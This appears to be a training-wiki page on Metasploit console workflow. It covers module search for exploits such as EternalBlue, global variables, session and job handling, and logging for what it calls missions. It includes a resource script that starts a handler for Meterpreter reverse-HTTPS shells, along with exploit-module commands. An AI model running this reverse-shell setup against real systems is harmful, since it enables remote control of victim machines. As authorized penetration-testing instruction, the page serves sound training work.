Skip to main content

Console & Workflow


Starting msfconsole​

# Standard launch
msfconsole

# Quiet launch (suppress banner - faster, cleaner)
msfconsole -q

# Launch and run a resource script on startup
msfconsole -q -r /opt/msf_scripts/handler.rc

The search command queries the module database. Knowing the right filters saves time.

# Search by name keyword
msf6 > search eternalblue
msf6 > search ms17_010

# Search by type
msf6 > search type:exploit platform:windows smb
msf6 > search type:auxiliary name:smb_login

# Search by CVE
msf6 > search cve:2021-44228

# Search by rank (only reliable/excellent exploits)
msf6 > search type:exploit rank:excellent platform:windows

Module ranks: manual β†’ low β†’ average β†’ normal β†’ good β†’ great β†’ excellent. Stick to great or better for CTE unless a specific module requires otherwise.


Module Info​

Always run info before using an unfamiliar module. Shows options, payload compatibility, references, and reliability notes.

msf6 > info exploit/windows/smb/ms17_010_eternalblue
msf6 > info auxiliary/scanner/smb/smb_ms17_010

Global Variables (setg)​

setg sets a variable globally - it persists across all modules in the current session. Saves re-typing LHOST, LPORT, and RHOSTS every time you switch modules.

# Set global listener address (your Kali IP)
msf6 > setg LHOST <KALI_IP>
msf6 > setg LPORT 443

# Set global target
msf6 > setg RHOSTS <TARGET_IP>

# Verify what's set globally
msf6 > get LHOST
msf6 > get LPORT

# Clear a global variable
msf6 > unsetg LHOST

# See all current variable values
msf6 > show options # (inside a module) - shows global + module-local values
Set LHOST Early

Run setg LHOST <KALI_IP> as soon as you launch msfconsole. Every module that needs a callback address will pick it up automatically.


Resource Scripts​

Resource scripts (.rc files) are plain text files with msfconsole commands - one per line. Use them to automate repetitive setup (handler startup, workspace init, scan imports).

Example: Persistent Handler Script​

# /opt/msf_scripts/handler_443.rc
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter_reverse_https
set LHOST <KALI_IP>
set LPORT 443
set ExitOnSession false
exploit -j
# Load at startup
msfconsole -q -r /opt/msf_scripts/handler_443.rc

# Or load from inside msfconsole
msf6 > resource /opt/msf_scripts/handler_443.rc

Example: Workspace Init Script​

# /opt/msf_scripts/init_workspace.rc
db_status
workspace -a 262COS_MSNNAME
setg LHOST <KALI_IP>
setg LPORT 443

Session Management Basics​

# List all active sessions
msf6 > sessions

# Interact with a session
msf6 > sessions -i <ID>

# Background the current session (from inside Meterpreter)
meterpreter > background

# Kill a session
msf6 > sessions -k <ID>

# Kill all sessions
msf6 > sessions -K

# Run a command against all sessions
msf6 > sessions -c "sysinfo" -i 1,2,3

Job Management​

Exploits run with -j become background jobs, allowing multiple listeners/exploits simultaneously.

# List running jobs
msf6 > jobs

# Kill a job
msf6 > jobs -k <ID>

# Kill all jobs
msf6 > jobs -K

Console Navigation Tips​

# Go back to root from inside a module
msf6 (exploit/...) > back

# Reuse the last module
msf6 > previous

# Tab completion works on module names, options, and file paths

# History search (same as bash)
# Ctrl+R - reverse search through command history

# Show recently used modules
msf6 > previous

# Reload a specific module (after editing it)
msf6 > reload_all

Useful Global Settings​

Set these once per session:

msf6 > setg LHOST <KALI_IP>
msf6 > setg LPORT 443
msf6 > setg ConsoleLogging true # Log console output to file
msf6 > setg LogLevel 1 # 0=off, 1=errors, 2=info, 3=debug

Enable Console Logging​

msf6 > spool /opt/msf_logs/msn_YYYYMMDD.log

All console output (commands + results) writes to the file. Essential for mission documentation and AAR reconstruction.

Always Spool

Run spool /opt/msf_logs/<FILENAME>.log immediately after workspace init. It's the closest thing MSF has to automatic mission logging.